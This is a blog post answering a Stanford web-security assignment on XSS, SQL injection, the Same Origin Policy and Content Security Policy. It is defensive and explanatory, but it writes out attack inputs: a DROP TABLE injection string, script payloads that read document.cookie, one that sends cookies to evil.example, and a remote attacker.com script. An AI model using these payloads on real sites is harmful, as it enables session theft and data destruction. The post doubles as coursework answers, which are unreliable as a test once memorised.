dmitry | Dec. 28, 2020, 11:57 a.m.
Here are some answers for Stanford's CS 253 Assignment 2. The course's instructor has kindly made the assignment questions publicly available on the course's website.
You and a friend built a site that accepts and displays user-generated content. You recently read the XKCD comic about code injection which made you realize that you're not sanitizing user-submitted data anywhere in your web app. You realize that you're almost certainly vulnerable to Cross site scripting (XSS) and SQL injection attacks – yikes!
Rereading the comic, you notice it ends with the phrase "I hope you've learned to sanitize your database inputs". Your friend suggests solving the issue by escaping all user-submitted data before inserting it into the database. Your friend argues that by sanitizing the inputs to the database as the comic suggests, the data can then be extracted from the database and safely used in HTML and SQL without further escaping. Is this a valid argument? Why or why not?
No, this is not a valid argument. The relevant principles are that user input should never be trusted and that perfect input sanitization is too tricky to get right in the first place, especially given all the layers that interact with the input; you would then need to keep getting it right as new attacks, bugs, and updates emerge. Instead of trusting sanitized inputs, use parameterized SQL queries: they separate the SQL code from the data it operates on, so user-supplied values are bound as parameters and can never be interpreted as SQL. In addition, data extracted from a database should be escaped (i.e., converted to a form that cannot be mistaken for code) at output time, using a method appropriate to the context in which the data will be used (for example, HTML escaping when rendering into HTML).
Sources:
1. https://bobby-tables.com/about
2. https://kevinsmith.io/sanitize-your-inputs
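The code/data separation that parameterized queries provide can be sketched with Python's built-in sqlite3 module (the table, columns, and payload below are made-up examples for illustration):

```python
import sqlite3

# In-memory database for the demonstration (schema is hypothetical)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")

# A classic injection attempt arriving as user input
malicious = "'); DROP TABLE comments; --"

# The "?" placeholders keep the SQL statement (code) fixed; the
# driver passes the values (data) separately, so the payload is
# stored as a literal string instead of being executed as SQL.
conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)",
             ("mallory", malicious))

row = conn.execute("SELECT body FROM comments").fetchone()
print(row[0])  # the payload comes back as inert text
```

Contrast this with splicing the value into the statement via string formatting, which is exactly the mistake the XKCD comic lampoons.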
You and a friend decide to build an internal dashboard that will show real-time HTTP requests that are being sent by visitors to your site. The dashboard displays information about each HTTP request received by the web server, including the client's IP address, HTTP method, URL, query parameters, referrer URL, and user agent name. Incidentally, this is the exact set of information that most popular web servers like Nginx or Apache print into the server log files. Here is what one line from such a log file looks like:
12.34.56.78 - - [17/Oct/2019:05:01:59 +0000] "GET /api/midi/search?q=hi&page=0 HTTP/1.0" 200 178 "https://example.com/search?q=h" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"
The internal dashboard will only be used by you and your friend and will not be exposed to the broader internet since the logs reveal information about your site visitors. Your friend argues that there is no need to worry about XSS vulnerabilities in an internal-only dashboard since neither of you would create an XSS attack to use against the other. Given that, they see no way that an XSS attack could occur. Is this a valid argument? Why or why not?
No, this is not a valid argument, because the attack does not have to come from either of you. The dashboard renders data that outside visitors fully control: the URL, query parameters, referrer URL, and user agent of every request are attacker-supplied. Any visitor to the public site can therefore mount a stored XSS attack against the dashboard simply by sending a request whose user agent (or URL, or referrer) contains a script payload; when you or your friend later view the dashboard, the payload executes in your browsers. The root cause is implicitly trusting outside input, and the consequences could include hijacking your authenticated sessions or abusing your internal access to change the web server configuration.
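As a sketch of the context-aware output escaping the dashboard would need, Python's html.escape can neutralize a script payload smuggled in through the User-Agent header (the header value here is a made-up example):

```python
import html

# An attacker can put anything they like in the User-Agent header
user_agent = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

# Escape before interpolating into the dashboard's HTML so the
# payload renders as visible text instead of executing.
safe = html.escape(user_agent)
print(safe)
```

The escaped string contains no raw angle brackets, so the browser displays the payload as text in the dashboard rather than running it.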
Name a real-world case where adherence to the Robustness principle (a.k.a. Postel's law) caused a system to have worse security. Explain how the Robustness principle led to the system having worse security properties.
The Robustness principle can be summarized to state that programs receiving data should accept as many types of data as possible, while programs sending data should only send necessary data (where necessary is dictated by specifications).
An example could be the Samy worm that exploited the fact that certain browsers allowed JavaScript code to be inserted within CSS tags. Samy Kamkar was then able to cleverly evade any restrictions MySpace had placed on editing user profiles (at the same time MySpace had been tolerating some customization by choice) to make his own profile the initial host of a self-propagating worm. Anybody who viewed his profile would cause the execution of the worm's payload and also transfer a copy of this payload to their own profile.
The ability to customize your MySpace profile originated from a bug that MySpace's developers chose not to fix, instead trusting their users to use it responsibly. Subsequent social networks like Facebook took a different approach, putting in place a much more standardized system for user profile customization that did not follow the Robustness principle.
Sources:
1. https://samy.pl/myspace/tech.html
2. https://tedium.co/2020/07/14/social-media-customization-failings/
Name three ways that the Same Origin Policy protects a website.
The SOP protects a website in (at least) three ways: (1) it prevents scripts on another origin from reading the responses to requests made to the site, even when the browser attaches the site's cookies; (2) it prevents pages on another origin from reaching into the site's DOM through frames or opened windows; and (3) it prevents another origin from reading the site's cookies, localStorage, and other client-side state. In short, scripts running on one origin cannot access data from a sensitive, authenticated session on a different origin.
Can JavaScript code running on attacker.com cause a GET request to be sent to victim.com?
Yes, the request can be sent (for example via an img tag, a form submission, or fetch()), but the browser will block attacker.com from reading the raw response from victim.com. A cross-origin script tag is the notable exception: the fetched script does run, but it executes within the environment of attacker.com.
Source:
1. https://gracefulsecurity.com/sop-same-origin-policy-basics/
Can JavaScript code running on attacker.com use the fetch() API to send a GET request to victim.com and read the HTTP response body? Assume no CORS headers are present on the response.
No. The fetch() call will send the request, but without CORS headers on the response the browser blocks attacker.com from reading the response body: a default (cors-mode) fetch fails with a network error, and a no-cors fetch yields an opaque response whose body is unreadable. JSONP is sometimes mentioned as a workaround, but it is not a fetch() bypass: it only works when victim.com deliberately exposes a JSONP endpoint that wraps its data in a script, which the attacker then loads via a script tag rather than fetch().
Can JavaScript code running on attacker.com submit a form via a POST request to victim.com?
Yes. The SOP does not block attacker.com from sending HTTP requests to victim.com, so the form submission will go through; the SOP only prevents attacker.com from reading the response. This is precisely why cross-site request forgery (CSRF) defenses are needed.
A fascinating Same origin policy "bypass" was described in "Cross-Origin JavaScript Capability Leaks: Detection, Exploitation, and Defense", a talk at USENIX '09 (one of the top security conferences). How could an attacker use this browser implementation bug to bypass the same origin policy? What was the key, underlying reason for the bug? What was the proposed mitigation?
The underlying cause of the bug is that the DOM and the JavaScript engine enforce the same origin policy using two different security models: the DOM acts as a reference monitor that prevents one website from accessing resources allocated to another website, while the JavaScript engine follows an object-capability discipline that prevents one website from obtaining JavaScript pointers to sensitive objects belonging to a foreign security origin.
An attacker can exploit the gap between these two models when a malicious script obtains a JavaScript pointer to one of the victim's JavaScript objects. From that object the attacker can obtain a pointer to its prototype, and that prototype pointer can be used to call DOM APIs with unexpected arguments, resulting in the execution of malicious scripts in the victim's origin.
This can be mitigated by adding access control checks throughout the JavaScript engine or by adopting an object-capability discipline throughout the DOM (in other words make the security models in the DOM and JavaScript Engine the same).
Content Security Policy (CSP) is one of the best ways to protect your site against XSS. A properly written CSP can completely protect your site from reflected and stored XSS attacks, even in the presence of a bug that allows the attacker to add their own HTML code to the site. An attacker takes advantage of a vulnerability in your site to inject an XSS payload into the HTML page sent by your server. Fortunately, you set up a CSP in case this happened because you follow a defense-in-depth security approach. Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self';
<script>alert(document.cookie)</script>
Yes. This CSP only allows JavaScript that is loaded from the same origin as the HTML page served by the victim server. The payload is an inline script rather than one loaded from that origin, and inline scripts are blocked by default unless 'unsafe-inline' or a matching nonce or hash source is present, so the code will not execute.
Would the following CSP prevent the XSS attack?
Content-Security-Policy:
default-src *; script-src 'self';
<script>alert(document.cookie)</script>
Yes. 'default-src' does not override an explicitly set 'script-src' directive, so the result is the same as in the previous question: the inline script is blocked. The permissive default-src * only means that other resource types (images, styles, and so on) may be loaded from any origin.
Would the following CSP prevent the XSS attack?
Content-Security-Policy:
default-src 'none'; script-src 'self' 'unsafe-eval'; connect-src 'self'; img-src 'self'; style-src 'self';
<script>alert(document.cookie)</script>
Yes, the CSP still prevents the attack. Adding the 'unsafe-eval' keyword to the 'script-src' directive only permits eval() and similar mechanisms inside scripts that are already allowed to run; it does not allow inline script blocks, so the payload remains blocked.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval'; connect-src 'self'; img-src 'self'; style-src 'self';
<script>eval('alert(document.cookie)')</script>
Yes, this CSP still prevents the attack. Wrapping the payload in eval() does not help, because the surrounding inline script block is itself blocked: 'unsafe-eval' only lifts the ban on eval() within scripts that are already permitted to execute, and without 'unsafe-inline' or a matching nonce the inline block never runs, so the eval() call is never reached.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src *; script-src 'self'; connect-src *; img-src *; style-src *;
<script src='https://attacker.com/xss.js'></script>
Yes. The script tag points to an origin different from that of the HTML page being served, and 'self' in the 'script-src' directive only allows same-origin JavaScript to execute; the wildcards in the other directives do not affect script loading, so the attack is blocked.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src 'none'; script-src 'self' https:; connect-src 'none'; img-src 'none'; style-src 'none';
<script src='https://attacker.com/xss.js'></script>
No, this CSP does not prevent the attack. Although 'self' only matches the page's own origin, the additional https: scheme source in the 'script-src' directive allows scripts to be loaded from any origin served over HTTPS, and https://attacker.com/xss.js qualifies, so the malicious script executes.
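A deliberately simplified sketch of why the https: scheme source is so permissive: it matches on scheme alone and ignores the host entirely (real CSP source matching has more rules; this only illustrates the scheme-source case, and the function name is made up):

```python
from urllib.parse import urlparse

def matches_https_scheme_source(url: str) -> bool:
    # A scheme source like "https:" matches any URL with that
    # scheme, regardless of host -- including an attacker's.
    return urlparse(url).scheme == "https"

print(matches_https_scheme_source("https://victim.com/app.js"))    # True
print(matches_https_scheme_source("https://attacker.com/xss.js"))  # True: allowed!
print(matches_https_scheme_source("http://attacker.com/xss.js"))   # False
```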
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh';
<script>alert(document.cookie)</script>
Yes, the CSP prevents the attack. One mechanism for allowing inline scripts is to give a script tag a nonce attribute and include that nonce in the 'script-src' directive of the CSP. Here the 'script-src' directive includes a nonce, but the script tag carries none, and the script is inline rather than loaded from the same origin as the HTML page, so it will not run: inline code remains blocked by default.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh';
<script nonce='xss'>alert(document.cookie)</script>
Same as the previous case: there is a mismatch between the nonce in the script tag and the one in the CSP's 'script-src' directive (xss != R28gU3RhbmZvcmQh), so the inline script is blocked and the attack is prevented.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh' 'unsafe-inline';
<script nonce='xss'>alert(document.cookie)</script>
In browsers that only support CSP Level 1, this policy would not prevent the attack: 'unsafe-inline' allows every inline script block to execute, regardless of nonce. However, CSP Level 2 and later specify that 'unsafe-inline' must be ignored when a nonce or hash source is present, so modern browsers fall back to nonce checking, the mismatched nonce fails to match, and the attack is blocked. In policies like this one, 'unsafe-inline' is typically included purely as a fallback for old browsers.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self';
<script src='/api/echo?str=alert(document.cookie)'></script>
The 'script-src' directive allows this script element, since /api/echo is on the same origin as the HTML page being served, so the browser will fetch it. Whether the payload then runs depends on how the echo endpoint responds: if it reflects the str parameter with a plain-text content type, the browser treats the response body alert(document.cookie) as text rather than JavaScript and the payload does not execute. An echo endpoint that reflected input with a JavaScript content type, however, would turn 'self' into a full CSP bypass, which is why reflective endpoints on an allowed origin are dangerous.
Assume that victim.com is protected with the following CSP:
Content-Security-Policy: script-src 'self' 'nonce-<nonce-value-here>';
The operator of attacker.com attempts to subvert victim.com's CSP by visiting victim.com and copying the nonce they observe in the CSP header into their XSS attack payload:
<script nonce='<nonce-value-here>'>alert(document.cookie)</script>
Would the CSP prevent the XSS attack?
(Assume that victim.com has properly implemented their CSP nonces.)
No, this attack should fail. A properly implemented CSP nonce is a fresh, unpredictable random value generated for every HTTP response. The nonce the attacker copied was only valid for the response they themselves received; by the time the victim loads the page, the server has issued a different nonce, so the attacker's stale nonce will not match and the injected script is blocked. Nonce-based CSP only breaks down if nonces are static, predictable, or reused.
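A per-response nonce can be sketched in Python with the standard secrets module (the header assembly is illustrative and not tied to any particular web framework):

```python
import secrets

def make_nonce() -> str:
    # Fresh, cryptographically unpredictable value for every HTTP
    # response; an attacker who observed an earlier nonce learns
    # nothing about the next one.
    return secrets.token_urlsafe(16)

nonce = make_nonce()
header = f"Content-Security-Policy: script-src 'self' 'nonce-{nonce}'"
# The server stamps the same nonce onto its own <script> tags in
# this response; the next response gets a brand-new nonce.
print(make_nonce() == make_nonce())  # False (collisions are negligible)
```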
Source:
1. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
Read the paper "CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy". Explain the problem that the 'strict-dynamic' keyword solves.
The paper's first conclusion is that the vast majority of CSP policies being deployed by Internet hosts can be bypassed by automated methods. This is because either inline scripts are allowed, or scripts from arbitrary external hosts are allowed or because of policy misconfigurations (including whitelisting origins with unsafe endpoints).
The paper suggests replacing script execution URL whitelists with a nonce-based policy in which a script executes only if its nonce attribute matches a nonce listed in the CSP. That creates a problem for scripts that are created dynamically at runtime (for example by widget and library loaders), since they have no way to carry the nonce. The 'strict-dynamic' keyword solves this: a script that was itself authorized by a nonce propagates trust to the scripts it dynamically creates, so they execute without needing their own nonce or a whitelist entry.
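As an illustration (reusing the made-up nonce value from earlier in this post), a policy in the style the paper recommends looks like this:

```
Content-Security-Policy: script-src 'nonce-R28gU3RhbmZvcmQh' 'strict-dynamic' https: 'unsafe-inline';
```

Browsers that understand 'strict-dynamic' ignore the https: and 'unsafe-inline' tokens and rely purely on the nonce plus propagated trust; older browsers that don't understand it fall back to those tokens, keeping the policy backwards compatible.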
I find answers to questions nobody else has time to answer, and to help me remember, I write them down here!